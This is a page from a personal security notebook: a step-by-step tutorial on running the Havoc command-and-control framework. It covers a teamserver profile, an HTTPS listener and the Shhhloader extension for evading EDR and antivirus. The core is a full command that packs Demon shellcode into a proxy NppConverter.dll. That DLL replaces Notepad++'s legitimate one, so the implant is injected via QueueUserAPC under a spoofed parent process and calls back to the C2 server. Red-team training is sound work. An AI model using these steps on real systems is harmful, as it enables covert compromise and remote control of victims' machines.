📒
Book of VanLuong
  • 👨‍💻About the Author
  • Cryptography
    • Cryptanalysis
      • RSA & RSA ATTACK
      • DES (Data Encryption Standard)
      • AES (Advanced Encryption Standard)
      • ECC ( Elliptic Curve of Cryptography)
      • Group-based Cryptography
      • Lattice-based Cryptography
      • ChaCha20-Poly1305
      • Hash Function
      • Wargame CTF
  • C2
    • Practical with Havoc Framework
  • Blue Teaming
    • SIEM & SOC
      • SIEM
      • SOC
      • Splunk
    • Cybersecurity Lab & Threat Intelligence
      • Build ELK Lab
        • Configure Elasticsearch and Kibana setup in ubuntu
        • Fluent Bit – Sending Logs to ELK with Fluent Bit
        • Winlogbeat – Collecting and Forwarding Windows Event Logs.
        • Filebeat – Collecting and Forwarding Windows Event Logs.
        • Send Logs from Winlogbeat through Logstash to ELK
        • Audit policy & Winlogbeat
      • Sysmon configuration
    • PowerShell in Incident Response and Threat Hunting
      • PowerShell For Incident Response
      • PowerShell For Threat Hunting
  • Techniques used in malware
    • DLL side loading
    • DLL Unhooking
    • Call stack spoofing
  • Wazuh App Dashboards for Splunk
  • Windows
    • 70 Vital Windows Commands
    • Windows Registry Forensics
  • Guide to Installing Kali Linux, DVWA, and bWAPP
    • Phần 1. CÀI ĐẶT HỆ ĐIỀU HÀNH KALI LINUX
    • Phần 2. CÀI ĐẶT DVWA
    • Phần 3. CÀI ĐẶT BWAPP
  • CTF
    • CTF-writeup-in-KCSC
Powered by GitBook
On this page
  • Teamserver Configuration
  • Start Teamserver
  • Start Client
  • Setup Listener
  • Install Extensions
  • Create shellcode
  • Create and deployment Payload with Shhhloader
  • Source Video

Was this helpful?

  1. C2

Practical with Havoc Framework

Teamserver Configuration

Teamserver needs a configuration profile (usually yml) to define parameters like IP, port, user and password.

Create configuration profile.

  • In the folder teamserver/data and fix and create file config.yml. Add script below.

Teamserver {
    Host = "0.0.0.0"
    Port = 40056

    Build {
        Compiler64 = "data/x86_64-w64-mingw32-cross/bin/x86_64-w64-mingw32-gcc"
        Compiler86 = "data/i686-w64-mingw32-cross/bin/i686-w64-mingw32-gcc"
        Nasm = "/usr/bin/nasm"
    }
}

Operators {
    user "at19n" {
        Password = "P@ssw0rd"
    }
}

# this is optional. if you dont use it you can remove it.
Service {
    Endpoint = "service-endpoint"
    Password = "service-password"
}

Demon {
    Sleep = 2
    Jitter = 15

    TrustXForwardedFor = false

    Injection {
        Spawn64 = "C:\\Windows\\System32\\notepad.exe"
        Spawn32 = "C:\\Windows\\SysWOW64\\notepad.exe"
    }
}

Start Teamserver

Run teamserver with configuration profile

./havoc server --profile profiles/havoc.yaotl -v

Start Client

Client is graphical interface to interact with teamserver

From folder client/build, run client:

Setup Listener

Listener is the point of receiving connections from agents (Demons) on the victim machine.

In the interface client, navigate Listeners -> Create Listeners.

A configuration listener (example: HTTPS)

  • Name: at19n-test

  • Type: HTTPS

  • Host: IP Address teamserver or redirector

  • Port: 443

  • Callback Interval: Time between callbacks (example: 5s)

Save and start listener. If success, listener display status "Active"

Hands on

Install Extensions

Extensions list

After clicking install, Havoc client automatically clones the Shhhloader source from github.

Description: Shhhahoc is the name of the Shhhloader integration module into Havoc, which allows the use of advanced shellcode injection techniques to evade EDR/AV.

Fearture:

  • Use SysWhispers (SysWhispers2, SysWhispers3, GetSyscallStub) to execute syscall indirect

  • Supports injection methods like PoolParty, ThreadlessInject, ModuleStomping, QueueUserAPC, ProcessHollow.

  • Encode options shellcode and sign digital certificates to avoid detection.

Hands on

Create shellcode

Create and deployment Payload with Shhhloader

Use Shhhloader to inject demon.x64.bin shellcode into legitimate NppConverter.dll

Purpose:

  • Create a malicious DLL (NppConverter.dll) containing shellcode that creates a connect to Havoc C2

  • This DLL will be loaded by notepad++.exe on startup, execute shellcode via QueueUserAPC.

  • On the Windows machine, we will change NppConverter.dll legitimate equal a malicious DLL to activate the payload.

/usr/bin/python3 /root/Havoc/data/extensions/Shhhloader/Shhhloader.py /root/share/demon.x64.bin -sc GetSyscallStub -m QueueUserAPC -o /root/share/NppConverter.dll -dp NppConverter.dll -pp explorer.exe -p notepad++.exe

  • /root/share/demon.x64.bin: Path to Demon shellcode

  • -sc GetSyscallStub: Use GetSyscallStub syscall method to avoid EDR hook

  • -m QueueUserAPC: Shellcode injection method using QueueUserAPC

  • -o /root/share/NppConverter.dll: The output file is NppConverter.dll (a malicious DLL)

  • -dp NppConverter.dll: Create a proxy DLL based on the legitimate NppConverter.dll

  • -pp explorer.exe: The parent process is explorer.exe

  • -p notepad++.exe: The target process for shellcode injection is notepad++.exe

Hands on

Source Video

PreviousWargame CTFNextSIEM & SOC

Last updated 1 month ago

Was this helpful?

4MB
khoidong-teamserver.mp4
4MB
profiles.mp4
14MB
khoidong-client.mp4
8MB
thietlap-listener.mp4
7MB
caidat-extensions.mp4
96MB
desployment_havoc_c2_shhhloader.mp4
24MB
payload_c2.mp4